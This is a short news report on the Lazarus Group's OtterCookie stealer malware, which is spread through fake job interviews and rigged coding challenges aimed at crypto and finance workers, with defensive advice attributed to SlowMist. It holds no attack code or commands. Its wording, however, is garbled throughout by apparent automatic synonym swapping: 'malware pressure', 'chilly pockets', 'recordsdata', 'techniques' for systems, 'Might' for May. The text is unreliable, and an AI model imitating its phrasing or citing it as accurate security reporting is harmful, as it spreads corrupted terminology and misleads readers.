Lazarus Group targets professionals with OtterCookie malware
North Korea-linked hacking group Lazarus is reportedly utilizing a brand new malware pressure referred to as OtterCookie to focus on individuals working in crypto and finance.
In accordance with a June 6 alert posted on X by web3 safety agency SlowMist, the group is reportedly utilizing faux job interviews, deepfake recruiter movies, and malware-laced coding challenges to ship the stealer malware. OtterCookie can extract browser-stored credentials, macOS Keychain passwords, digital certificates, and personal keys from crypto wallets.
It permits attackers to quietly steal confidential knowledge from focused techniques, particularly macOS machines. The tactic is gaining traction as attackers rely much less on large-scale exploits and extra on extremely focused, social-engineering-based strategies.
The newest malware seems to be a part of Lazarus Group’s steady efforts to penetrate the cryptocurrency trade. The group was accountable for February’s historic $1.5 billion Bybit hack, wherein they obtained chilly pockets signers by means of social engineering and spear phishing.
In current months, Lazarus has additionally launched npm bundle assaults geared toward developer environments and pockets infrastructure, together with Solana (SOL) and Exodus. In April, the FBI and cybersecurity agency Silent Push seized a faux web site utilized by Lazarus, often known as “Blocknovas,” which posed as a U.S.-based tech firm to ship malware by means of job scams.
In accordance with SlowMist, crypto professionals ought to train warning when responding to unsolicited job or funding gives, notably in the event that they require downloading recordsdata or collaborating in video calls with strangers. Customers ought to enhance endpoint detection and response, chorus from operating unknown binaries, and routinely examine techniques for uncommon exercise.
To date this 12 months, the crypto trade has taken the heaviest hit on account of high-profile hacks. Q1 losses amounted to greater than $1.6 billion, and the pattern appears to be persevering with. PeckShield estimates that losses from hacks totaled $244.1 million in Might. Two vital occasions had been the $220 million Cetus Protocol hack and one other $12 million Cork Protocol exploit.